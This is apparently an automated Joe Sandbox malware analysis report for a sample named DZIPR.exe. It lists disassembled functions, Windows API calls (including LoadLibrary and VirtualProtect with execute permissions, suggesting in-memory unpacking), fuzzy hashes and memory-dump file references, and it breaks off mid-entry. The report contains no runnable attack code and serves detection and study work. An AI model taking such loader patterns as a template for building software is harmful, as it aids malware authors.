Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: 4922f0e6e4d3929a68ac80751ffe04282fe4b419d26881ad6c24ae063daa4979
Instruction ID: 567fdddfa673031b5207004eb288e27c79d8088d5d00ece3f5e8a5108e3850c7
Opcode Fuzzy Hash: 4922f0e6e4d3929a68ac80751ffe04282fe4b419d26881ad6c24ae063daa4979
Instruction Fuzzy Hash: C8014C3214569AFBCF026F958D08EDF3F26AF993A5F218022FA1451520C736C572EBA5

Function 6C54EC63 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 6C54EC89

Part of subcall function 6C54EAAE: __fltout2.LIBCMT ref: 6C54EADA

__cftog_l.LIBCMT ref: 6C54ECAF
__cftoe_l.LIBCMT ref: 6C54ECE1

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: bdb0c8eb074e32115dd1a2be93897af1a7d936da3cc35cdfc4313cca5a143caa
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: C8117E7244018ABBCF129F84DC018EE7F62BB59358B148814FA2859530C772CAB1AB81

Function 6C5403CF Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 6C5403DC
GetTopWindow.USER32(00000000), ref: 6C5403EF

Part of subcall function 6C5403CF: GetWindow.USER32(00000000,00000002), ref: 6C540436

GetTopWindow.USER32(?), ref: 6C54041F

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: 0e9440e92cc3eff63e80516a5c11eb177f4a15281ee46643ca23763a1d9ca5a1
Instruction ID: 4f9f49c4ccbf115d563ad0a2ff61ca4b81e7d9b602149227891c13165ed83f0d
Opcode Fuzzy Hash: 0e9440e92cc3eff63e80516a5c11eb177f4a15281ee46643ca23763a1d9ca5a1
Instruction Fuzzy Hash: 6301D43214559AA78B122E218C04ECF3B79AFE13A5B65C123FD1895901E730C9119696

Function 6C53CD66 Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000B), ref: 6C53CD75
GetSystemMetrics.USER32(0000000C), ref: 6C53CD7C
GetSystemMetrics.USER32(00000002), ref: 6C53CD83
GetSystemMetrics.USER32(00000003), ref: 6C53CD8D

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: e3f5f56ca6579bea771263c53561362fc010282d515134d66b93251521715cee
Instruction ID: ce967d310dd3bf049977b24fcb95eccc058d6229abfa78d264c87999c5335642
Opcode Fuzzy Hash: e3f5f56ca6579bea771263c53561362fc010282d515134d66b93251521715cee
Instruction Fuzzy Hash: 29F06DB1F80714BBEB105F728C49F267F78EB42721F024517E6048B280CBB598008FD4

Function 6C53C220 Relevance: 6.0, APIs: 4, Instructions: 38COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(6C5634A8), ref: 6C53C25A
RtlInitializeCriticalSection.NTDLL(?), ref: 6C53C26C
RtlLeaveCriticalSection.NTDLL(6C5634A8), ref: 6C53C279
RtlEnterCriticalSection.NTDLL(?), ref: 6C53C289

Part of subcall function 6C536DC1: __CxxThrowException@8.LIBCMT ref: 6C536DD7
Part of subcall function 6C536DC1: __EH_prolog3.LIBCMT ref: 6C536DE4

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
String ID:
API String ID: 2895727460-0
Opcode ID: a30d39d77fe7382878975db070f43ff2395809aa02af90b195782b2eab319405
Instruction ID: cea0ded3ee4f02df64a84acdbe6bd51c0a6c4932eb7176c17c907f488bb85993
Opcode Fuzzy Hash: a30d39d77fe7382878975db070f43ff2395809aa02af90b195782b2eab319405
Instruction Fuzzy Hash: BCF0FC73200134AFCB002A9ACC45B15BB79EBD2315F561516F14883D11EF30A440CA69

Function 6C53BA5B Relevance: 6.0, APIs: 4, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(6C5632EC), ref: 6C53BA69
TlsGetValue.KERNEL32(6C5632D0,?,?,?,?,6C53C0B7,?,00000004,6C53AF00,6C536DDD,6C5368AD,?,6C544902,?), ref: 6C53BA7D
RtlLeaveCriticalSection.NTDLL(6C5632EC), ref: 6C53BA93
RtlLeaveCriticalSection.NTDLL(6C5632EC), ref: 6C53BA9E

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: dc607467f9c3e4e93e56f3eeb274dbe908059b77f0d99056ca85ebd717306f1d
Instruction ID: 7947912ed56899dbb50e9aff3540f80731eb0f3bed96af294ee8db2fa711fb98
Opcode Fuzzy Hash: dc607467f9c3e4e93e56f3eeb274dbe908059b77f0d99056ca85ebd717306f1d
Instruction Fuzzy Hash: 45F05E76354A189FD720AF68CC88C0AB7BDEB8536431A5426F66D93601EA30F8459BA1

Function 6C55057A Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6C550586

Part of subcall function 6C54A27F: __getptd_noexit.LIBCMT ref: 6C54A282
Part of subcall function 6C54A27F: __amsg_exit.LIBCMT ref: 6C54A28F

__getptd.LIBCMT ref: 6C55059D
__amsg_exit.LIBCMT ref: 6C5505AB
__lock.LIBCMT ref: 6C5505BB

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 651ad498443fd8baf03e33ae889be52a949b81f198ee3b53da07d3775d53b46b
Instruction ID: 41d93554cd4cf6e2ceedfd1ad8e201ca54a85253a773af88d0a120ff6ca8528c
Opcode Fuzzy Hash: 651ad498443fd8baf03e33ae889be52a949b81f198ee3b53da07d3775d53b46b
Instruction Fuzzy Hash: FCF0F032901310CBDB21AF688C0578C33A06BC072CFD1861BD441A7FE1CB74AD05CB51

Function 6C54020C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6C54029B
SendMessageW.USER32(00000000,00000433,00000000,?), ref: 6C5402C4

Strings

,, xrefs: 6C5402BA

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: MessageSend_memset
String ID: ,
API String ID: 1827994538-3772416878
Opcode ID: a2c439a71a0fbdbf5b8f52f230288525ccdacce6a4bd79c40f50a447ff3079e1
Instruction ID: d496f66de9fe350538faf560853e6fbe3a13d4e97a5f1ed68d43d8e451698ea2
Opcode Fuzzy Hash: a2c439a71a0fbdbf5b8f52f230288525ccdacce6a4bd79c40f50a447ff3079e1
Instruction Fuzzy Hash: 3131F030205350EFDB109FB5CC84A9EB7F5BFC8318B25422EE55697A90EB30E804CB54

Function 6C53A698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 6C53A59C: GetModuleHandleW.KERNEL32(KERNEL32,6C53A6B6), ref: 6C53A5AA
Part of subcall function 6C53A59C: GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6C53A5CB
Part of subcall function 6C53A59C: GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6C53A5DD
Part of subcall function 6C53A59C: GetProcAddress.KERNEL32(ActivateActCtx), ref: 6C53A5EF
Part of subcall function 6C53A59C: GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6C53A601

GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6C53A6D0
SetLastError.KERNEL32(0000006F), ref: 6C53A6E7

Strings

, xrefs: 6C53A705

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: AddressProc$Module$ErrorFileHandleLastName
String ID:
API String ID: 2524245154-3916222277
Opcode ID: 414a20cbd89a7e3372e0b917840d29690056fa5bbaab2112c947fe438360507d
Instruction ID: 111da6882df8f30cbd4ad303514501fb73323b0aac8ce3624a2e48c8a751bc28
Opcode Fuzzy Hash: 414a20cbd89a7e3372e0b917840d29690056fa5bbaab2112c947fe438360507d
Instruction Fuzzy Hash: 1B214F7091022C9EDB20DFB5CC9C7DEB7B8BF54328F108699D069D6280EB745A89CF55

Function 6C538E50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6C538E78
PathFindExtensionW.SHLWAPI(?), ref: 6C538E8E

Part of subcall function 6C538BDF: __EH_prolog3_GS.LIBCMT ref: 6C538BE9
Part of subcall function 6C538BDF: GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6C538EB7,?,?), ref: 6C538C19
Part of subcall function 6C538BDF: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6C538C2D
Part of subcall function 6C538BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6C538C69
Part of subcall function 6C538BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6C538C77
Part of subcall function 6C538BDF: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6C538C94
Part of subcall function 6C538BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6C538CBF
Part of subcall function 6C538BDF: ConvertDefaultLocale.KERNEL32(000003FF), ref: 6C538CC8
Part of subcall function 6C538BDF: GetModuleFileNameW.KERNEL32(6C530000,?,00000105), ref: 6C538D7F

Strings

%s%s.dll, xrefs: 6C538E99

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
String ID: %s%s.dll
API String ID: 1311856149-1649984862
Opcode ID: d0d32027c938ddff1eecbde857f7ddacba1281ee1c766f0ae70f88927434f91d
Instruction ID: 8182582bfe700338f7dbe194d35f0b626899695c9d57cb303225900237e6298b
Opcode Fuzzy Hash: d0d32027c938ddff1eecbde857f7ddacba1281ee1c766f0ae70f88927434f91d
Instruction Fuzzy Hash: 9401A271A15128EBCB05CBA8DC859EFB7F9AF49304F51046BA409EB140EA70DA088B95

Function 6C54C53C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6C545017: __getptd.LIBCMT ref: 6C54501D
Part of subcall function 6C545017: __getptd.LIBCMT ref: 6C54502D

__getptd.LIBCMT ref: 6C54C54B

Part of subcall function 6C54A27F: __getptd_noexit.LIBCMT ref: 6C54A282
Part of subcall function 6C54A27F: __amsg_exit.LIBCMT ref: 6C54A28F

__getptd.LIBCMT ref: 6C54C559

Strings

csm, xrefs: 6C54C567

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: a711b0bedc9af858f1a86284ce073587ea150faf51f5d3325d337f2bcfad7745
Instruction ID: a4bc0c7a0a0d489d142b9916b2f89e7c006702e7fe04f6966c797d431be211d1
Opcode Fuzzy Hash: a711b0bedc9af858f1a86284ce073587ea150faf51f5d3325d337f2bcfad7745
Instruction Fuzzy Hash: 0A018F78805201DBCF20BF61CC446DDBBB5AF90319F64842ED44096E91EB31A998DF51

Function 6C540DE2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6C540DE9

Strings

PVl, xrefs: 6C540E0B
xPVl, xrefs: 6C540E13

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: H_prolog3
String ID: PVl$xPVl
API String ID: 431132790-1350471361
Opcode ID: 35786514d7a8a681dab92d45033bcb183361e452071d32c7c9e1a729f4d6905e
Instruction ID: 92bac4cfa5ed725665778d68288b38aa0e3317bcb63d73cd47f314dc26fc1ded
Opcode Fuzzy Hash: 35786514d7a8a681dab92d45033bcb183361e452071d32c7c9e1a729f4d6905e
Instruction Fuzzy Hash: EAF0F472902361CBDB649B658D85BADB3E06F94319FB1860FD4A64BEA0C7748C64C682

Function 6C5372FD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6C537318
PathStripToRootW.SHLWAPI(00000000,00000104,00000000,00000104,?,6C537540,00000000,?), ref: 6C53732D

Strings

@uSl, xrefs: 6C537302, 6C537333

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: PathRootStrip_memset
String ID: @uSl
API String ID: 2213896960-1039666814
Opcode ID: e3e94d6848c7d4a1dd06e98622d92f456a72ff80c9d3a47207da30903645cc09
Instruction ID: 7c1cfbc7a3eb326548a3862751ff10ab039e873ab825b715d00f8446856c9f23
Opcode Fuzzy Hash: e3e94d6848c7d4a1dd06e98622d92f456a72ff80c9d3a47207da30903645cc09
Instruction Fuzzy Hash: 3DE09A33100024B7C6016A998C44EFF3B6D9FC66B4F608215FA2856AD1AF60A91596B6

Analysis Process: DZIPR.exePID: 6392, Parent PID: 1064COMMON

Executed Functions

Function 6FD063F0 Relevance: 4.7, APIs: 3, Instructions: 239
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(00000000), ref: 6FD06602
VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6FD0663B
VirtualProtect.KERNELBASE(?,?,?,00000000,?), ref: 6FD06654

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 8a459d540d555f948c4b4a3cf1bfaeb95bb47b02068f64583507f30ccd888f73
Instruction ID: 670a35c1f06ebaee90fa672aeb1907094d93b1c44b1e75ee1176e2ab4b36fb40
Opcode Fuzzy Hash: 8a459d540d555f948c4b4a3cf1bfaeb95bb47b02068f64583507f30ccd888f73
Instruction Fuzzy Hash: 13A1BB3190C7568FC355DF28C48062EBBE2BF8A308F09896EE89597246D630F991CB91

Function 6FD05CA0 Relevance: 3.4, APIs: 2, Instructions: 353
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: LibraryLoad_memset
String ID:
API String ID: 2997193564-0
Opcode ID: 46792139d0385141904166d5918f73eb1be585f3f59414ffdcc30d7ab0237199
Instruction ID: c40424980b65ce33ca67e2c882e5eb90586ba5e5822c41d9da163350015a1e96
Opcode Fuzzy Hash: 46792139d0385141904166d5918f73eb1be585f3f59414ffdcc30d7ab0237199
Instruction Fuzzy Hash: 9AE189B1A087069FC768DF19C49062AFBE5FF89314F54892EE89A87351DB30F851CB91

Function 6FD05E70 Relevance: 1.5, APIs: 1, Instructions: 248
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNELBASE(00000000,007F50EB), ref: 6FD05ECA

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 344e3246a208d30ec22637ae0239e19a14acbfe04028b270e20c7fb495bd3c64
Instruction ID: a2f183c709bb0e5d2af4f304f41226401f6863e33681f8749eb95aa6125ba79e
Opcode Fuzzy Hash: 344e3246a208d30ec22637ae0239e19a14acbfe04028b270e20c7fb495bd3c64
Instruction Fuzzy Hash: 6CA1A270608306CFC758EF2CC19022ABBE2BF8A304F14856EE99687356D771F861CB91

Function 6FD0BC4E Relevance: 16.6, APIs: 11, Instructions: 106
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlEnterCriticalSection.NTDLL(6FD332EC), ref: 6FD0BC61
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,6FD332D0,6FD332D0,?,6FD0C0A4,00000004,6FD0AF00,6FD06DDD,6FD068AD,?,6FD14902,?), ref: 6FD0BCB7
GlobalHandle.KERNEL32(00CFD188), ref: 6FD0BCC0
GlobalUnlock.KERNEL32(00000000), ref: 6FD0BCCA
GlobalReAlloc.KERNEL32(?,00000000,00002002), ref: 6FD0BCE3
GlobalHandle.KERNEL32(00CFD188), ref: 6FD0BCF5
GlobalLock.KERNEL32(00000000), ref: 6FD0BCFC
RtlLeaveCriticalSection.NTDLL(00000000), ref: 6FD0BD05
GlobalLock.KERNEL32(00000000), ref: 6FD0BD11
_memset.LIBCMT ref: 6FD0BD2B
RtlLeaveCriticalSection.NTDLL(00000000), ref: 6FD0BD59

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: a084fb59197e63c3fd56d0168d952e4aa6fc5662fe72e4394e64a33d24703728
Instruction ID: 910216be7f965600740ef761079ccaf246e9f899a612c70e97bd9f5bf2cd9640
Opcode Fuzzy Hash: a084fb59197e63c3fd56d0168d952e4aa6fc5662fe72e4394e64a33d24703728
Instruction Fuzzy Hash: 2131A172608B04AFEB619F74C849A5EB7F9FF45310B04492AE652D7680DB30F850CBA0

Function 6FD064E0 Relevance: 4.7, APIs: 3, Instructions: 151
librarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(00000000), ref: 6FD06602
VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6FD0663B

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: LibraryLoadProtectVirtual
String ID:
API String ID: 3279857687-0
Opcode ID: 917a237bfb3f5a68118ca95ab0a384bbaac2edd0f2c4cf68edb7c87aea01ee17
Instruction ID: 1afc88c41837ce16ba9b15667f4f4162bcc78a2feaa6732fe27d991f4bf574aa
Opcode Fuzzy Hash: 917a237bfb3f5a68118ca95ab0a384bbaac2edd0f2c4cf68edb7c87aea01ee17
Instruction Fuzzy Hash: 2951F2316083568FC715DF28C88062EFBE6BFCA308F09896EE88547316C630F946CB91

Function 6FD06750 Relevance: 1.6, APIs: 1, Instructions: 109
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6FD2C168), ref: 6FD06300

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
